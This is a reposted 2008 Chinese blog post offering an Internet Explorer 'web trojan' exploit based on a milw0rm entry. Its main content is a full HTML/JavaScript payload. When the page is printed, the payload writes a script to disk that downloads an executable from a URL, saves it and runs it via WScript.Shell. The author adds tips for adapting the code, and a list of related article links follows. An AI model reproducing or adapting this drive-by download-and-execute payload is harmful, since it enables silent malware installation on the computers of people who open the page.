IE0DAY网马
来源:互联网 发布:学编程需要学数学吗 编辑:程序博客网 时间:2024/05/18 00:37
这个漏洞参考http://www.milw0rm.com/exploits/5619
Author: Greysign
2008-5-24
http://www.scanw.com/blog
哈哈。标题吸引吗。
修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。
不过。这个漏洞利用的好也可以玩一玩的。
<html><body>Print me with table of links to execute<a href="http://www.bla.com?x=b<script defer >var ForWriting = 2;var strFile = 'c://test2.js';var objFSO = new ActiveXObject('Scripting.FileSystemObject');var objStream = objFSO.OpenTextFile(strFile,ForWriting,true,false);objStream.WriteLine('var objArgs = /'http://127.0.0.1/test.exe/';');objStream.WriteLine('var objargss =/'c:////gtest.exe/';');objStream.WriteLine('var sGet=new ActiveXObject(/'ADODB.Stream/');');objStream.WriteLine('var xGet = false;');objStream.WriteLine('try {');objStream.WriteLine('xGet = new XMLHttpRequest();');objStream.WriteLine('} ');objStream.WriteLine('catch (trymicrosoft) {');objStream.WriteLine('try {');objStream.WriteLine(' xGet = new ActiveXObject(/'Msxml2.XMLHTTP/');');objStream.WriteLine('} ');objStream.WriteLine('catch (othermicrosoft) {');objStream.WriteLine(' try {');objStream.WriteLine(' xGet = new ActiveXObject(/'Microsoft.XMLHTTP/');');objStream.WriteLine(' } ');objStream.WriteLine('catch (failed) {');objStream.WriteLine(' xGet = false;');objStream.WriteLine(' }');objStream.WriteLine('}');objStream.WriteLine('}');objStream.WriteLine('xGet.Open (/'GET/',objArgs.toLowerCase(),0);');objStream.WriteLine('xGet.Send();');objStream.WriteLine('sGet.Mode=3;');objStream.WriteLine('sGet.Type=1;');objStream.WriteLine('sGet.Open();');objStream.WriteLine('sGet.Write (xGet.ResponseBody);');objStream.WriteLine('sGet.SaveToFile (objargss.toLowerCase(),2);');objStream.WriteLine('var x=new ActiveXObject(/'WScript.Shell/');');objStream.WriteLine('x.Run(objargss);');objStream.Close();var objShell = new ActiveXObject('wscript.shell');objShell.Run(strFile);</script>a.c<u>o</u>m"></a><script>window.print();</script></body></html>
- IE0DAY网马
- 网马 解密 (下)
- MPEG-2网马
- 比较全面的 网马 的解密 (上)
- 让iframe失效,使自己的网站不怕iframe网马
- 让iframe失效,使自己的网站不怕iframe网马
- 实战:阿里云服务器CentOS6.5下Tomcat网马WAR入侵解决
- 老太太 原创漫画o(∩_∩)o... 这个版权所有了呵呵
- [四天学会ajax] 学习Ajax教程第四天,利用 DOM 进行 Web 响应
- 大型Web2.0站点构建技术初探
- 诺基亚:目前无意支持Google Android平台
- 十个习惯让你精通新的开发技术
- IE0DAY网马
- vc常用数据结构类型
- 怎样成为AJAX高手?
- 对MS word javascript execution的一些测试
- CSRF: 不要低估了我的危害和攻击能力
- Windows安全桌面与用户桌面间的通信
- 几个操作系统仅供参考 - 操作系统开发 - 纯C论坛 纯粹的计算机底层技术论坛 - Powered by Discuz!
- 迅雷协议分析–多链接资源获取
- 免得忘了写在这了